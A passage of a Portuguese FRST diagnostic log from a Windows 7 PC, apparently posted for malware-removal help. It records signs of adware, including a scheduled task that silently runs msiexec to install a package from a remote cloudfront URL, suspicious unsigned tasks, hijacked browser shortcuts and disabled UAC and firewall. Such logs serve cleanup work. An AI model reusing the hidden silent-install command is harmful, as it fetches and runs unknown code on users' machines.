Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 23-07-2017 Executado por Will (24-07-2017 08:25:07) Executando a partir de C:\Users\Will\Desktop Windows 7 Ultimate (X64) (2015-07-22 12:58:40) Modo da Inicialização: Normal ========================================================== ==================== Contas: ============================= Administrador (S-1-5-21-4234246703-1863528978-1842615642-500 - Administrator - Disabled) Convidado (S-1-5-21-4234246703-1863528978-1842615642-501 - Limited - Enabled) Will (S-1-5-21-4234246703-1863528978-1842615642-1000 - Administrator - Enabled) => C:\Users\Will ==================== Central de Segurança ======================== (Se uma entrada for incluída na fixlist, será removida.) AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF} AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402} ==================== Programas Instalados ====================== (Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.) Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 17.009.20058 - Adobe Systems Incorporated) Adobe Flash Player 26 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 26.0.0.137 - Adobe Systems Incorporated) Adobe Flash Player 26 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 26.0.0.137 - Adobe Systems Incorporated) Albion Online (HKLM-x32\...\SandboxAlbionOnline) (Version: - Sandbox Interactive GmbH) AutoCAD 2014 - English (HKLM\...\{5783F2D7-D001-0000-0102-0060B0CE6BBA}) (Version: 19.1.18.0 - Autodesk) Hidden AutoCAD 2014 - English (HKLM\...\{5783F2D7-D001-0409-2102-0060B0CE6BBA}) (Version: 19.1.18.0 - Autodesk) Hidden AutoCAD 2014 Language Pack - English (HKLM\...\{5783F2D7-D001-0409-1102-0060B0CE6BBA}) (Version: 19.1.18.0 - Autodesk) Hidden Autodesk 360 (HKLM\...\{52B28CAD-F49D-47BA-9FFE-29C2E85F0D0B}) (Version: 4.0.27.1 - Autodesk) Autodesk App Manager (HKLM-x32\...\{C070121A-C8C5-4D52-9A7D-D240631BD433}) (Version: 1.1.0 - Autodesk) Autodesk AutoCAD 2014 - English (HKLM\...\AutoCAD 2014 - English) (Version: 19.1.18.0 - Autodesk) Autodesk Content Service (HKLM-x32\...\{62F029AB-85F2-0000-866A-9FC0DD99DDBC}) (Version: 3.1.3.0 - Autodesk) Hidden Autodesk Content Service (HKLM-x32\...\Autodesk Content Service) (Version: 3.1.3.0 - Autodesk) Autodesk Content Service Language Pack (HKLM-x32\...\{62F029AB-85F2-0001-866A-9FC0DD99DDBC}) (Version: 3.1.3.0 - Autodesk) Hidden Autodesk Featured Apps (HKLM-x32\...\{F732FEDA-7713-4428-934B-EF83B8DD65D0}) (Version: 1.1.0 - Autodesk) Autodesk Material Library 2014 (HKLM-x32\...\{644F9B19-A462-499C-BF4D-300ABC2A28B1}) (Version: 4.0.19.0 - Autodesk) Autodesk Material Library Base Resolution Image Library 2014 (HKLM-x32\...\{51BF3210-B825-4092-8E0D-66D689916E02}) (Version: 4.0.19.0 - Autodesk) Autodesk ReCap (HKLM\...\{31ABA3F2-0000-1033-0102-111D43815377}) (Version: 1.0.43.13 - Autodesk) Hidden Autodesk ReCap (HKLM\...\Autodesk ReCap) (Version: 1.0.43.13 - Autodesk) Autodesk ReCap Language Pack-English (HKLM\...\{31ABA3F2-0010-1033-0102-111D43815377}) (Version: 1.0.43.13 - Autodesk) Hidden Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 17.5.2302 - AVAST Software) Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) CCleaner (HKLM\...\CCleaner) (Version: 5.27 - Piriform) Clean Master (HKLM-x32\...\Clean Master) (Version: 1.0 - Cheetah Mobile) Driver Booster 4.3 (HKLM-x32\...\Driver Booster_is1) (Version: 4.3.0 - IObit) DriverEasy 4.9.14 (HKLM\...\DriverEasy_is1) (Version: 4.9.14.0 - Easeware) Estudo de aprimoramento de produto para HP Deskjet 2540 series (HKLM\...\{44FE0FDF-E044-4EA9-AC22-325CDD4C3241}) (Version: 32.2.188.47710 - Hewlett-Packard Co.) Firebird 2.5.3.26780 (Win32) (HKLM-x32\...\FBDBServer_2_5_is1) (Version: 2.5.3.26780 - Firebird Project) Gerbackup 2.4 (HKLM-x32\...\GerBackup_is1) (Version: - Gerempre) Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.115 - Google Inc.) Hidden HK-Software IBExpert Developer Studio Trial Version (HKLM-x32\...\HK-Software IBExpert Developer Studio Trial Version_is1) (Version: - ) HP Deskjet 2540 series Ajuda (HKLM-x32\...\{70B5D5B2-8014-4C22-9963-361B1F07B81A}) (Version: 30.0.0 - Hewlett Packard) HP Deskjet 2540 series Software básico do dispositivo (HKLM\...\{A4BA74B3-3DCB-47CC-9C80-C2CBAC26C6EB}) (Version: 32.2.188.47710 - Hewlett-Packard Co.) HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard) HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP) HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.4.19.3 - Hewlett-Packard Company) HP Support Solutions Framework (HKLM-x32\...\{57A79409-9C79-4080-9FFA-09D4DAECC26B}) (Version: 12.7.27.15 - HP) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) HPDiagnosticAlert (HKLM-x32\...\{B6465A32-8BE9-4B38-ADC5-4B4BDDC10B0D}) (Version: 1.00.0001 - Microsoft) Hidden Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2932 - Intel Corporation) Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation) Java 8 Update 131 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180131F0}) (Version: 8.0.1310.11 - Oracle Corporation) Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation) Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft XNA Framework Redistributable 3.0 (HKLM-x32\...\{3898934B-05AE-41CD-96BE-70DA9BFBCE1F}) (Version: 3.0.11010.0 - Microsoft Corporation) Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation) Mozilla Firefox 51.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 pt-BR)) (Version: 51.0.1 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1.6234 - Mozilla) MPC-HC 1.7.9 (HKLM-x32\...\{2624B969-7135-4EB1-B0F6-2D8C397B45F7}_is1) (Version: 1.7.9 - MPC-HC Team) MSI to redistribute MS VS2005 CRT libraries (HKLM-x32\...\{A8D93648-9F7F-407D-915C-62044644C3DA}) (Version: 8.0.50727.42 - The Firebird Project) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) Nero 7 Ultra Edition (HKLM-x32\...\{CF097717-F174-4144-954A-FBC4BF301046}) (Version: 7.02.9753 - Nero AG) Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden Pacote de Idiomas do Microsoft .NET Framework 4.5 - Português (Brasil) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1046) (Version: 4.5.50709 - Microsoft Corporation) Qualcomm Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Qualcomm Atheros) Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.29093 - Realtek Semiconductor Corp.) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.92.115.2015 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.) Realtek PCI Fast Ethernet Controller Driver (HKLM-x32\...\{AE46ABD3-D625-467F-B5A7-8D3FFF077F0D}) (Version: 6.112.123.2014 - Realtek) SafeZone Stable 3.55.2393.609 (HKLM-x32\...\SafeZone 3.55.2393.609) (Version: 3.55.2393.609 - Avast Software) Hidden SketchUp Import for AutoCAD 2014 (HKLM-x32\...\{644E9589-F73A-49A4-AC61-A953B9DE5669}) (Version: 1.1.0 - Autodesk) TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.47484 - TeamViewer) Tibia (HKU\S-1-5-21-4234246703-1863528978-1842615642-1000\...\Tibia) (Version: - CipSoft GmbH) WhatsApp (HKU\S-1-5-21-4234246703-1863528978-1842615642-1000\...\WhatsApp) (Version: 0.2.1880 - WhatsApp) WinRAR 5.21 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH) ==================== Exame Personalizado CLSID (Whitelisted): ========================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) CustomCLSID: HKU\S-1-5-21-4234246703-1863528978-1842615642-1000_Classes\CLSID\{6A221957-2D85-42A7-8E19-BE33950D1DEB}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2014\acad.exe (Autodesk, Inc.) CustomCLSID: HKU\S-1-5-21-4234246703-1863528978-1842615642-1000_Classes\CLSID\{7DE1BE5C-CEBA-4F1D-ACBC-9CE11EE9A2A1}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2014\acad.exe (Autodesk, Inc.) CustomCLSID: HKU\S-1-5-21-4234246703-1863528978-1842615642-1000_Classes\CLSID\{BD0DEB94-63DB-4392-9420-6EEE05094B1F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2014\acad.exe (Autodesk, Inc.) CustomCLSID: HKU\S-1-5-21-4234246703-1863528978-1842615642-1000_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2014\en-US\acadficn.dll (Autodesk, Inc.) ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-07-12] (AVAST Software) ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-07-12] (AVAST Software) ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2013-02-08] (Autodesk, Inc.) ContextMenuHandlers01: [AcShellExtension.AcContextMenuHandler] -> {2E7A2C6C-B938-40a4-BA1C-C7EC982DC202} => C:\Program Files\Common Files\Autodesk Shared\AcShellEx\AcShellExtension.dll [2013-02-08] (Autodesk) ContextMenuHandlers01: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-07-12] (AVAST Software) ContextMenuHandlers01: [Cover Designer] -> {73FCA462-9BD5-4065-A73F-A8E5F6904EF7} => -> Nenhum Arquivo ContextMenuHandlers01: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-02-18] (Alexander Roshal) ContextMenuHandlers01: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Nenhum Arquivo ContextMenuHandlers03: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-07-12] (AVAST Software) ContextMenuHandlers05: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2012-12-21] (Intel Corporation) ContextMenuHandlers06: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-07-12] (AVAST Software) ContextMenuHandlers06: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-02-18] (Alexander Roshal) ContextMenuHandlers06: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Nenhum Arquivo ==================== Tarefas Agendadas (Whitelisted) ============= (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) Task: {006BD817-9757-497E-8B08-F690CA0C787C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2017-04-07] (HP Inc.) Task: {05938EC2-D967-4848-AA34-570B2DE125CA} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated) Task: {0CB7B760-2C97-46F3-8885-8BF9F35A9ACF} - System32\Tasks\HPCeeScheduleForWill => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard) Task: {0F120363-0CF1-4F1D-AEA8-AEE78654AE37} - System32\Tasks\DriverEasy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe [2016-01-20] (Easeware) Task: {288C948C-3F77-4F8A-9F7C-FC6AABA34FFA} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-06-28] (HP Inc.) Task: {2AFFBAB7-0D9F-4F1A-9B15-E3E1C0955A55} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.) Task: {33B63C58-559E-41B8-8400-A540A4E587A0} - System32\Tasks\{96A82CB2-B5F5-4E22-9347-BDD0A1171773} => C:\Windows\system32\pcalua.exe -a F:\sp61518.exe -d F:\ Task: {446BA484-9B11-41D0-809E-615BA3D11DB1} - System32\Tasks\Plowiry Community => C:\Program Files (x86)\Ruzeghneriph\yaupdcache.exe [2017-06-01] () Task: {4536C19F-C125-4079-840B-F79AB10ADDD8} - System32\Tasks\{E517552F-45C4-4028-B11A-E115C7755C3C} => C:\Windows\system32\pcalua.exe -a D:\Suprema\XML\vc_redist.x86.exe -d D:\Suprema\XML Task: {480C58A7-717F-4FBB-878A-B0437A1AAC75} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\4.3.0\Scheduler.exe [2017-03-10] (IObit) Task: {4B90DA62-D860-4407-AB48-D4A6C5BDEA51} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation) Task: {56E49A0E-B35E-40B2-A733-43FAB61C60C8} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-02-07] (Piriform Ltd) Task: {5CD229B4-C47E-410F-B877-91397AB94601} - System32\Tasks\Driver Booster SkipUAC (Will) => C:\Program Files (x86)\IObit\Driver Booster\4.3.0\DriverBooster.exe [2017-03-16] (IObit) Task: {5EAF88EA-5226-43A7-81CD-B7AA2005B1EC} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation) Task: {5FFDC021-3C03-40ED-9A63-839A322FCF81} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-07-11] (Adobe Systems Incorporated) Task: {7A9C66AD-09E5-442F-B3C5-1587D5D7132E} - System32\Tasks\SafeZone scheduled Autoupdate 1468328978 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-06-13] (Avast Software) Task: {7D0D885E-6321-43B6-BECA-5B2A2570B3E1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2017-06-22] (HP Inc.) Task: {820D88CE-DC92-4D8A-ACBF-15018A4D004C} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-07-12] (AVAST Software) Task: {83AF40AD-E210-419F-9098-6E2B1AAC1077} - System32\Tasks\{1943C3F8-010E-4F0D-8690-840C7C25133C} => C:\Windows\system32\pcalua.exe -a F:\sp64259.exe -d F:\ Task: {843DC047-81A6-401A-9F5B-805F59484CF8} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.) Task: {A8E53D6F-2A8B-4685-9CA1-CB1E0D7272C9} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () Task: {A9751AFC-E8F2-4789-8EDC-35B6B9D681AE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation) Task: {B7F41EA1-11E0-4091-A6E6-45A90D24504A} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-07-12] (AVAST Software) Task: {C7615589-EB69-4733-8749-15E8C2A9CD4A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2017-04-07] (HP Inc.) Task: {C86B8B13-9774-4B3A-BF8A-EFA348B63090} - System32\Tasks\HPCustParticipation HP Deskjet 2540 series => C:\Program Files\HP\HP Deskjet 2540 series\Bin\HPCustPartic.exe [2014-03-06] (Hewlett-Packard Co.) Task: {D59AFCB0-CD75-4AE7-B18B-B1CB69BB875F} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2017-04-19] (Realtek Semiconductor) Task: {DF667A03-0F83-47B5-BFBA-DD74AB7FF086} - System32\Tasks\Microsoft\Windows\DeviceSettings\Ckiwoing => "msiexec" /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST500LM012XHN-M500MBB_S2Z1J5BDB05496&d=20170601 /q <==== ATENÇÃO Task: {E391A1BC-1A3C-4E7A-A3E8-4D0761EB4991} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [2017-04-19] (Realtek Semiconductor) (Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.) Task: C:\Windows\Tasks\DriverEasy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe Task: C:\Windows\Tasks\HPCeeScheduleForWill.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe ==================== Atalhos & WMI ======================== (As entradas podem ser listadas para serem restauradas ou removidas.) ShortcutWithArgument: C:\Users\Will\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Americanas.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://compre.vc/v2/1248175c752 ShortcutWithArgument: C:\Users\Will\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\CasasBahia.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://hohosearch.com/?uid=1234#red=aHR0cDovL2FkLnphbm94LmNvbS9wcGMvPzMwMjkwOTg3QzI4MTIyOTMxMVQ= ==================== Módulos Carregados (Whitelisted) ============== 2014-10-14 23:27 - 2014-10-14 23:27 - 08897696 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll 2012-12-21 10:52 - 2012-12-21 10:52 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll 2015-12-15 15:38 - 2016-09-05 14:57 - 02417664 _____ () D:\Suprema\Integradados\aIntegrador.exe 2017-07-12 13:26 - 2017-07-12 13:26 - 00162032 _____ () c:\Program Files\AVAST Software\Avast\x64\vaarclient.dll 2017-07-12 13:26 - 2017-07-12 13:26 - 00831664 _____ () C:\Program Files\AVAST Software\Avast\x64\ffl2.dll 2017-07-12 13:26 - 2017-07-12 13:26 - 00276808 _____ () c:\Program Files\AVAST Software\Avast\x64\StreamBack.dll 2017-07-12 13:26 - 2017-07-12 13:26 - 00170224 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll 2017-07-12 13:26 - 2017-07-12 13:26 - 00192664 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll 2017-07-12 13:26 - 2017-07-12 13:26 - 00224256 _____ () C:\Program Files\AVAST Software\Avast\tasks_core.dll 2017-07-21 10:50 - 2017-07-21 10:50 - 05784064 _____ () C:\Program Files\AVAST Software\Avast\defs\17072100\algo.dll 2017-07-12 13:26 - 2017-07-12 13:26 - 00689272 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll 2017-07-12 13:26 - 2017-07-12 13:26 - 00231664 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll 2017-07-12 13:26 - 2017-07-12 13:28 - 01038952 _____ () C:\Program Files\AVAST Software\Avast\AvChrome.dll 2017-07-12 13:26 - 2017-07-12 13:26 - 67109376 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll 2017-07-12 13:26 - 2017-07-12 13:26 - 00292920 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll 2014-10-14 23:28 - 2014-10-14 23:28 - 08897696 _____ () C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll ==================== Alternate Data Streams (Whitelisted) ========= (Se uma entrada for incluída na fixlist, somente o ADS será removido.) AlternateDataStreams: C:\ProgramData\TEMP:56E2E879 [135] AlternateDataStreams: C:\Users\Todos os Usuários\TEMP:56E2E879 [135] ==================== Modo de Segurança (Whitelisted) =================== (Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SMPCHelper => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tvnserver => ""="" ==================== Associação (Whitelisted) =============== (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.) HKU\S-1-5-21-4234246703-1863528978-1842615642-1000\Software\Classes\.scr: AutoCADScriptFile => C:\Windows\system32\notepad.exe "%1" ==================== Internet Explorer confiável/restrito =============== (Se uma entrada for incluída na fixlist, será removida do Registro.) ==================== Hosts Conteúdo: =============================== (Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.) 2009-07-13 23:34 - 2017-07-13 00:20 - 00000856 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 clients2.google.com ==================== Outras Áreas ============================ (Atualmente não há nenhuma correção automática para esta seção.) HKU\S-1-5-21-4234246703-1863528978-1842615642-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Will\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 200.225.197.34 - 200.225.197.37 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0) Firewall do Windows está desabilitado. ==================== MSCONFIG/TASK MANAGER ítens desabilitados == MSCONFIG\startupfolder: C:^Users^Will^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Monitorar alertas de tinta - HP Deskjet 2540 series (Copiar 1).lnk => C:\Windows\pss\Monitorar alertas de tinta - HP Deskjet 2540 series (Copiar 1).lnk.Startup MSCONFIG\startupfolder: C:^Users^Will^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Monitorar alertas de tinta - HP Deskjet 2540 series.lnk => C:\Windows\pss\Monitorar alertas de tinta - HP Deskjet 2540 series.lnk.Startup MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\Will\AppData\Local\Akamai\netsession_win.exe" MSCONFIG\startupreg: Backup => C:\Gerempre\GerBackup\gerbackup.exe MSCONFIG\startupreg: BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA} => "C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe" MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe MSCONFIG\startupreg: RazerCortex => C:\Program Files (x86)\Razer\Razer Cortex\RazerCortex.exe -autorun MSCONFIG\startupreg: uTorrent => "C:\Users\Will\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED ==================== Regras do Firewall (Whitelisted) =============== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) FirewallRules: [TCP Query User{CDD2BE6E-C1D0-492D-9469-9E59394B9C10}C:\program files (x86)\firebird\firebird_1_5\bin\fbserver.exe] => (Allow) C:\program files (x86)\firebird\firebird_1_5\bin\fbserver.exe FirewallRules: [UDP Query User{764160D8-F07A-4163-B853-D50C227577D0}C:\program files (x86)\firebird\firebird_1_5\bin\fbserver.exe] => (Allow) C:\program files (x86)\firebird\firebird_1_5\bin\fbserver.exe FirewallRules: [{8C97C4DA-998F-491F-9470-3776CF63196D}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{B0339B7D-DCF1-46BE-B26C-9ABD42F4DA2A}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: 